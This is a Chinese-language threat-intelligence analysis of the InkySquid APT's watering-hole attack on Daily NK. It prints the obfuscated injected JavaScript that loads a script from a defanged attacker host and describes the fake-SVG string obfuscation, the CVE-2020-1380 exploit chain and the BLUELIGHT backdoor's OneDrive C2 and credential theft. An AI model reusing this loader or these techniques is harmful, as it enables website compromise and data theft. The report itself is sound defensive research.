朝鲜InkySquid APT组织利用浏览器漏洞感染受害者。

　　2021年4月，Volexity研究人员识别出了通过www.dailynk[.]com网站加载到恶意子域名的jquery[.]services可疑代码。加载恶意代码的URL包括：

　　hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

　　hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

　　这些URL指向的是Daily NK网站使用的合法文件，但是内容被攻击者修改了，其中包含重定向用户从攻击者控制的域名jquery[.]services加载恶意JS。攻击者控制的代码只加入了很短的时间就被移除了，使得攻击者活动的识别变得非常困难。

　　CVE-2020-1380

　　Volexity研究人员发现攻击者利用的首个漏洞是CVE-2020-1380，一个IE 0 day漏洞利用。攻击者在Daily NK网站的下述合法文件中加入了一行代码：

　　hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

　　加入到Daily NK网站的混淆的代码如下：

　　function vgrai（）{var e=document.createElement（“script”）；e.src=fecet（“w6625I》7x=y37t4;=5t48xrt5>4t52105x8t<t:6t0s=/x0=y5”,15），document.head&&document.head.appendChild（e）}function vdgie（）{const e=window.navigator.userAgent,t=e.indexOf（“rv:11.0 ”），i=e.indexOf（“Trident/”）；return t>0||i>0}vdgie（）&&vgrai（）；

　　加入以上代码后，如果用户用IE来访问Daily NK，页面就会从以下URL加载其他的JS文件：

　　hxxps://ui.jquery[.]services/responsive-extend.min.js

　　请求时，由于有正确的IE User-Agent，主机就会作为其他混淆的JS代码。初始重定向后，攻击者会选择将恶意代码隐藏在合法代码中。在本例中，攻击者使用了“bPopUp” JS库。这一选择具有2个结果：

　　分析JS的人可能会误认为其是合法的，因为大多数代码都是非恶意的；

　　识别恶意JS代码的自动化解决方案也可能会误认为这些代码是非恶意的，因为代码大部分可以与合法库内容匹配。

　　攻击者使用的漏洞利用代码中还包含许多混淆在变量中的字符串，以使其显得像合法的SVG内容。攻击者隐藏字符串的示例如图1所示：

　　图 1. SVG变量中混淆的字符串

　　为解密这些字符串，需要执行以下步骤：

　　通过M43.2字符串将path变量中的d属性中的数据分割开来；

　　将分割出的数据的每个元素通过空格符再次分割，会得到一个数字列表；

　　将这些数字转成整数；

　　如果整数大于30，就减去17，并加到生成的字符串中。如果整数小于等于30，就丢弃该数字。

　　总的来看，一共使用了3个假的SVG对象。一旦这些对象中的字符串替换为JS，识别漏洞利用就很容易了。解密和替换后的代码如图2所示：

　　图 2. CVE-2020-1380实现

　　代码对应的是TrendMicro研究人员发布的CVE-2020-1380漏洞PoC代码。

　　成功利用后，JS会使用相同的方法来解密最终的SVG变量，最终生成一个十六进制编码的Cobalt Strike stager，然后解码和执行。本例中，下载其他shellcode的URL包括：

　　hxxps://ui.jquery[.]services/swipeout.min.js

　　hxxps://ui.jquery[.]services/swipeout.min.css

　　hxxps://ui.jquery[.]services/slider.min.css

　　BLUELIGHT

　　在另一个样本中，攻击者使用jquery[.]services子域名来存放一个新的恶意软件家族。文件存放位置为：

　　hxxps://storage.jquery[.]services/log/history

　　history文件是一个XOR编码的定制恶意软件副本，恶意软件开发者和Volexity都将其命名为BLUELIGHT。命名依据是恶意软件PDB字符串：

　　E:\Development\BACKDOOR\ncov\Release\bluelight.pdb

　　BLUELIGHT是Cobalt Strike成功传播后的第二个payload。BLUELIGHT恶意软件使用不同的云服务提供商作为C2。恶意软件样本使用Microsoft Graph API进行C2操作。最开始的时候，BLUELIGHT使用硬编码的参数来进行oauth 2 token认证。客户端认证后，BLUELIGHT就会在OneDrive appfolder文件夹下创建子目录，创建的子目录名有：

　　logo

　　normal

　　background

　　theme

　　round

　　文件夹和子目录建立后，就会以JSON对象的格式来收集以下信息：

　　用户名

　　计算机名

　　操作系统版本

　　Web IP

　　默认接口的本地IP

　　本地时间

　　植入的二进制文件是32位还是64位

　　进程SID授权登记

　　进程文件名

　　安装的反病毒软件列表

　　受感染的机器是否运行虚拟机

　　这些数据会经过XOR编码为一个二进制blob并上传。所有上传的文件都会以。jpg作为扩展，不同的子目录和文件名表明不同类型的命令数据。

　　C2循环在初始上传侦查数据后开始，大约30秒循环一次。前5分钟内，每个循环会截图，并以时间戳作为文件名上传到normal子目录。5分钟后，截图每隔5分钟上传一次。

　　在每个循环中，客户端会通过美剧background子目录来查询新的命令。文件名表明要执行的命令，文件的内容提供命令相关的进一步信息。支持的命令包括：

　　执行和下载shellcode

　　下载和启动可执行文件，然后上传程序输出

　　获取IE、Edge、Chrome、Naver Whale等支持的浏览器中的cookie和密码数据库

　　递归检索路径和上传文件元数据；

　　产生一个进程来递归检索路径，以zip文件形式上传文件；

　　中止文件上传线程。

　　卸载。

　　命令文件在处理后会被删除，大多数命令生成的文件会上传到round目录。但zip upload会使用theme子目录。